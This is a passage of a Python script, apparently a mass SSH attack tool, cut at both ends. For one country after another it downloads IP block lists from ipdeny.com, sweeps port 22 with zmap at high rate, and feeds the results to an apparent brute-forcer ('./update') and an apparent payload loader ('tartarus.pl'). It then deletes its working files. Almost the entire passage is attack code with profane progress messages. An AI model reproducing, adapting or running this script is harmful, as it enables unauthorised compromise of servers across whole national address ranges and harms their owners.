vex('wget http://ipdeny.com/ipblocks/data/countries/ge.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"gf.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/gf.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"gg.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/gg.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"gh.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/gh.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"gi.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/gi.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"gm.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/gm.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"gn.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/gn.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"gp.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/gp.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"gq.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/gq.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"gr.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/gr.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"gt.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/gt.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"gu.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/gu.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"gw.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/gw.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"gy.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/gy.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w ga.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ga.zone vuln.txt mfu.txt')
vex('zmap -p22 -w gb.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf gb.zone vuln.txt mfu.txt')
vex('zmap -p22 -w gd.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf gd.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ge.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ge.zone vuln.txt mfu.txt')
vex('zmap -p22 -w gf.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf gf.zone vuln.txt mfu.txt')
vex('zmap -p22 -w gg.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf gg.zone vuln.txt mfu.txt')
vex('zmap -p22 -w gh.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf gh.zone vuln.txt mfu.txt')
vex('zmap -p22 -w gi.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf gi.zone vuln.txt mfu.txt')
vex('zmap -p22 -w gm.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf gm.zone vuln.txt mfu.txt')
vex('zmap -p22 -w gn.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf gn.zone vuln.txt mfu.txt')
vex('zmap -p22 -w gp.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf gp.zone vuln.txt mfu.txt')
vex('zmap -p22 -w gq.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf gq.zone vuln.txt mfu.txt')
vex('zmap -p22 -w gr.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf gr.zone vuln.txt mfu.txt')
vex('zmap -p22 -w gt.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf gt.zone vuln.txt mfu.txt')
vex('zmap -p22 -w gu.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf gu.zone vuln.txt mfu.txt')
vex('zmap -p22 -w gw.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf gw.zone vuln.txt mfu.txt')
vex('zmap -p22 -w gy.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf gy.zone vuln.txt mfu.txt')
print("fucking finally ): starting H-Zone")
time.sleep(3)
vex('clear')
#########################################
#  _    _      ______                
# | |  | |    |___  /                
# | |__| |______ / / ___  _ __   ___ 
# |  __  |______/ / / _ \| '_ \ / _ \
# | |  | |     / /_| (_) | | | |  __/
# |_|  |_|    /_____\___/|_| |_|\___|
#########################################
print(""+ white +"Downloading "+ red +"H-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"hk.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/hk.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"hn.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/hn.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"hr.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/hr.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"hu.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/hu.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w hk.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf hk.zone vuln.txt mfu.txt')
vex('zmap -p22 -w hn.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf hn.zone vuln.txt mfu.txt')
vex('zmap -p22 -w hr.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf hr.zone vuln.txt mfu.txt')
vex('zmap -p22 -w hu.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf hu.zone vuln.txt mfu.txt')
print("fucking finally ): starting I-Zone")
time.sleep(3)
vex('clear')
#########################################
#  _____    ______                
# |_   _|  |___  /                
#   | |______ / / ___  _ __   ___ 
#   | |______/ / / _ \| '_ \ / _ \
#  _| |_    / /_| (_) | | | |  __/
# |_____|  /_____\___/|_| |_|\___|
#########################################
print(""+ white +"Downloading "+ red +"I-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"id.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/id.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ie.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ie.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"il.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/il.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"im.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/im.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"in.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/in.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"io.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/io.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"iq.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/iq.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ir.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ir.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"is.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/is.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"it.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/it.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w id.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf id.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ie.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ie.zone vuln.txt mfu.txt')
vex('zmap -p22 -w il.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf il.zone vuln.txt mfu.txt')
vex('zmap -p22 -w im.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf im.zone vuln.txt mfu.txt')
vex('zmap -p22 -w in.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf in.zone vuln.txt mfu.txt')
vex('zmap -p22 -w io.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf io.zone vuln.txt mfu.txt')
vex('zmap -p22 -w iq.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf iq.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ir.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ir.zone vuln.txt mfu.txt')
vex('zmap -p22 -w is.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf is.zone vuln.txt mfu.txt')
vex('zmap -p22 -w it.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf it.zone vuln.txt mfu.txt')
print("fucking finally ): starting I-Zone")
time.sleep(3)
vex('clear')
#########################################
#       _      ______                
#      | |    |___  /                
#      | |______ / / ___  _ __   ___ 
#  _   | |______/ / / _ \| '_ \ / _ \
# | |__| |     / /_| (_) | | | |  __/
#  \____/     /_____\___/|_| |_|\___|
########################################
print(""+ white +"Downloading "+ red +"J-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"je.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/je.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"jm.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/jm.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"jo.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/jo.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"jp.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/jp.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w je.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf je.zone vuln.txt mfu.txt')
vex('zmap -p22 -w jm.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf jm.zone vuln.txt mfu.txt')
vex('zmap -p22 -w jo.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf jo.zone vuln.txt mfu.txt')
vex('zmap -p22 -w jp.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf jp.zone vuln.txt mfu.txt')
#########################################
#  _  __   ______                
# | |/ /  |___  /                
# | ' /_____ / / ___  _ __   ___ 
# |  <______/ / / _ \| '_ \ / _ \
# | . \    / /_| (_) | | | |  __/
# |_|\_\  /_____\___/|_| |_|\___|
#########################################
print(""+ white +"Downloading "+ red +"K-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ke.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ke.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"kg.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/kg.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"kh.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/kh.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ki.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ki.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"km.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/km.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"kn.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/kn.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"kp.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/kp.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"kr.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/kr.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"kw.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/kw.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ky.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ky.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"kz.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/kz.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w ke.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ke.zone vuln.txt mfu.txt')
vex('zmap -p22 -w kg.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf kg.zone vuln.txt mfu.txt')
vex('zmap -p22 -w kh.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf kh.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ki.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ki.zone vuln.txt mfu.txt')
vex('zmap -p22 -w km.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf km.zone vuln.txt mfu.txt')
vex('zmap -p22 -w kn.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf kn.zone vuln.txt mfu.txt')
vex('zmap -p22 -w kp.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf kp.zone vuln.txt mfu.txt')
vex('zmap -p22 -w kr.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf kr.zone vuln.txt mfu.txt')
vex('zmap -p22 -w kw.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf kw.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ky.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ky.zone vuln.txt mfu.txt')
vex('zmap -p22 -w kz.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf kz.zone vuln.txt mfu.txt')
#########################################
#  _        ______                
# | |      |___  /                
# | |  ______ / / ___  _ __   ___ 
# | | |______/ / / _ \| '_ \ / _ \
# | |____   / /_| (_) | | | |  __/
# |______| /_____\___/|_| |_|\___|
#########################################                              


print(""+ white +"Downloading "+ red +"L-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"la.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/la.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"lb.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/lb.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"lc.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/lc.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"li.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/li.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"lk.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/lk.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"lr.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/lr.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ls.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ls.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"lt.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/lt.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"lu.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/lu.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"lv.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/lv.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ly.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ly.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')
vex('zmap -p22 -w la.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf la.zone vuln.txt mfu.txt')
vex('zmap -p22 -w lb.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf lb.zone vuln.txt mfu.txt')
vex('zmap -p22 -w lc.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf lc.zone vuln.txt mfu.txt')
vex('zmap -p22 -w li.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf li.zone vuln.txt mfu.txt')
vex('zmap -p22 -w lk.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf lk.zone vuln.txt mfu.txt')
vex('zmap -p22 -w lr.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf lr.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ls.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ls.zone vuln.txt mfu.txt')
vex('zmap -p22 -w lt.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf lt.zone vuln.txt mfu.txt')
vex('zmap -p22 -w lu.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf lu.zone vuln.txt mfu.txt')
vex('zmap -p22 -w lv.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf lv.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ly.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ly.zone vuln.txt mfu.txt')
#########################################
#  __  __      ______                
# |  \/  |    |___  /                
# | \  / |______ / / ___  _ __   ___ 
# | |\/| |______/ / / _ \| '_ \ / _ \
# | |  | |     / /_| (_) | | | |  __/
# |_|  |_|    /_____\___/|_| |_|\___|
#                                    
#########################################


print(""+ white +"Downloading "+ red +"M-Zone "+ white +"Collection..")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ma.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ma.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"mc.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/mc.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"md.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/md.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"me.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/me.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"mf.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/mf.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"mg.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/mg.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"mh.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/mh.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"mk.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/mk.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ml.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ml.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"mm.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/mm.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"mn.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/mn.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"mo.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/mo.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"mp.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/mp.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"mq.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/mq.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"mr.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/mr.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"ms.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/ms.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"mt.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/mt.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"mt.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/mu.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"mv.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/mv.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"mw.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/mw.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"mx.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/mx.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"my.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/my.zone')
print(""+ red +"Finished"+ white +"!")
print(""+ white +"Downloading "+ red +"File"+ white +":"+ red +"["+ cyan +"mz.zone"+ red +"]"+ white +"")
vex('wget http://ipdeny.com/ipblocks/data/countries/mz.zone')
print(""+ red +"Finished"+ white +"!")
time.sleep(2)
vex('clear')

vex('zmap -p22 -w ma.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ma.zone vuln.txt mfu.txt')
vex('zmap -p22 -w mc.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf mc.zone vuln.txt mfu.txt')
vex('zmap -p22 -w md.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf md.zone vuln.txt mfu.txt')
vex('zmap -p22 -w me.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf me.zone vuln.txt mfu.txt')
vex('zmap -p22 -w mf.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf mf.zone vuln.txt mfu.txt')
vex('zmap -p22 -w mg.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf mg.zone vuln.txt mfu.txt')
vex('zmap -p22 -w mh.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf mh.zone vuln.txt mfu.txt')
vex('zmap -p22 -w mk.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf mk.zone vuln.txt mfu.txt')
vex('zmap -p22 -w ml.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf ml.zone vuln.txt mfu.txt')
vex('zmap -p22 -w mm.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf mm.zone vuln.txt mfu.txt')
vex('zmap -p22 -w mn.zone -o mfu.txt -B10000M && ./update 2500; perl tartarus.pl vuln.txt && rm -rf mn.zone vuln.txt mfu.txt')
